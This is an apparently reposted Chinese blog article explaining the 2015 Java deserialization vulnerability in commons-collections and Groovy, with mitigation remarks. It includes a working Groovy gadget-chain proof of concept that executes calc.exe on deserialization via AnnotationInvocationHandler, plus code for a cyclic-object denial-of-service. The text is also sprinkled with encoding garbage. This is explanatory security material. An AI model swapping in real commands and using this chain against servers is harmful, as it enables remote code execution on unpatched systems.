摘要:現實中可以通過調試模式,修改字節碼或者等多種方式修改該值反序列化不調用構造函數�����,的非零檢查不會觸發由于是�,會導致算數異常,線程結束攻擊者可以創建循環對象鏈�,然后序列化���。
Java 反序列化攻擊漏洞由 FoxGlove 的最近的一篇博文爆出,該漏洞可以被黑客利用向服務器上傳惡意腳本��,或者遠程執行命令�����。
由于目前發現該漏洞存在于 Apache commons-collections���, Apache xalan 和 Groovy 包中�,也就意味著使用了這些包的服務器(目前發現有WebSphere��, WebLogic����,JBoss)��,第三方框架(Spring�,Groovy)��,第三方應用(Jenkins)�����,以及依賴于這些服務器,框架或者直接/間接引用這些包的應用都會受到威脅���,這樣的應用的數量會以百萬計。
說到漏洞存在的原因���,根本還在于 Java 序列化自身的缺陷,眾所周知�����,序列化的目的是使 Java 對象轉化成字節流���,方便存儲或者網絡上傳輸���。Java 對象分解成字節碼過程叫做序列化��,從字節碼組裝成 Java 對象的過程叫做反序列化,這兩個過程分別對應于的 writeObject 和 readObject 方法��。問題在于 readObject 在利用字節流組裝 Java 對象時不會調用構造函數�, 也就意味著沒有任何類型的檢查,用戶可以復寫 readObject() 方法執行任何希望執行的代碼����。
這可能會導致三方面問題:
1. 序列化對象修改了對象或者父類的某個未加保護的關鍵屬性���,導致未預料的結果����。
例如:
class Client {
private int value;
public Client(int v) {
if (v <= 0) {
throw new RuntimeException("not positive number");
}
value = v;
}
public void writeObject(ObjectOutputStream oos) throws IOException {
int value = 0; //這里該值被改為0����。(現實中可以通過調試模式,修改serialize字節碼或者class instrument等多種方式修改該值)
oos.defaultWriteObject();
}
}
class Controller {
private ArrayBlockingQueue queue;
public void receiveState(ObjectInputStream o) throws IOException, ClassNotFoundException {
Client s = (Client)o.readObject(); //反序列化不調用構造函數����,value的非零檢查不會觸發
queue.add(s);
}
public Client getClient() throws InterruptedException {
return (Client)queue.take();
}
}
class Server extends Thread {
private Controller controller = new Controller();
private int result = 100;
public void run() {
while (true) {
try {
result = result / controller.getClient().getValue(); // 由于value是0�,會導致算數異常,線程結束
Thread.sleep(100);
} catch (InterruptedException e) {}
}
}
}
2. 攻擊者可以創建循環對象鏈,然后序列化�����。會導致反序列化無法結束, 空耗系統資源����。例如:
Set root = new HashSet();
Set s1 = root;
Set s2 = new HashSet();
for (int i = 0; i < 10; i++) {
Set t1 = new HashSet();
Set t2 = new HashSet();
t1.add("foo"); //使t2不等于t1
s1.add(t1);
s1.add(t2);
s2.add(t1);
s2.add(t2);
s1 = t1;
s2 = t2;
}
3. 用戶在收到序列化對象流時可以選擇存儲在本地�,以后再處理。由于沒有任何校驗機制�����,使得上傳惡意程序成為可能��。
class Controller {
public void receiveState(ObjectInputStream ois) {
FileOutputStream fos = new FileOutputStream(new File("xxx.ser"));
fos.write(ois); //實際并不知道存的是什么�,可能是惡意腳本�����。
fos.close();
}
}
那么這次由 FoxGlove 暴露出來的 Serialization Attack 具體是怎樣呢��?下面是 Groovy 的一個例子:
public class GroovyTest {
public static void main(String[] args) throws Exception {
final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("calc.exe", "execute"), "entrySet");
Class[] clsArr = {Map.class};
final Map map = Map.class.cast(Proxy.newProxyInstance(GroovyTest.class.getClassLoader(), clsArr, closure));
final Constructor ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
ctor.setAccessible(true);
final InvocationHandler handler = (InvocationHandler)ctor.newInstance(Override.class, map);
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(handler);
byte[] bytes = bos.toByteArray(); //對象被序列化
ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
ObjectInputStream ois = new ObjectInputStream(bis);
ois.readObject(); //反序列化時calc.exe被執行
}
}
在這個例子中,ConvertedClosure 會把一個 Closure 對象映射成 Java 的 entrySet 方法���,而在AnnotationInvocationHandler 的 readObject 方法中,會嘗試調用 entrySet() 方法��,這會觸發 calc.exe 的調用�����。
private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
var1.defaultReadObject();
AnnotationType var2 = null;
try {
var2 = AnnotationType.getInstance(this.type);
} catch (IllegalArgumentException var9) {
throw new InvalidObjectException("Non-annotation type in annotation serial stream");
}
Map var3 = var2.memberTypes();
Iterator var4 = this.memberValues.entrySet().iterator();
while(var4.hasNext()) {
Entry var5 = (Entry)var4.next();
String var6 = (String)var5.getKey();
Class var7 = (Class)var3.get(var6);
if(var7 != null) {
Object var8 = var5.getValue();
if(!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
}
}
}
}
針對這個問題�,FoxGlove Security 提到開發者不應該反序列化任何不信任的數據���,而實際情況卻是開發者對該問題的危害沒有足夠的認知���,他提到一種激進的做法那就是如果你足夠勇敢可以嘗試掃描并刪除存在反序列化漏洞的類���,但是實際情況是第一沒有人敢于冒這種風險��,第二����,當應用對象的依賴關系會很復雜���,反序列化過程會導致很多關聯對象被創建��,所以掃描不能保證所有的問題類被發現。
然而幸運的是�,這個問題引起了一些安全公司的重視��,在他們推出的 RASP(Runtime Application Security Protection)產品中會在應用運行期對該漏洞進行防護。
本文轉自 OneAPM 官方博客
文章版權歸作者所有���,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除�。
轉載請注明本文地址:http://m.specialneedsforspecialkids.com/yun/65350.html
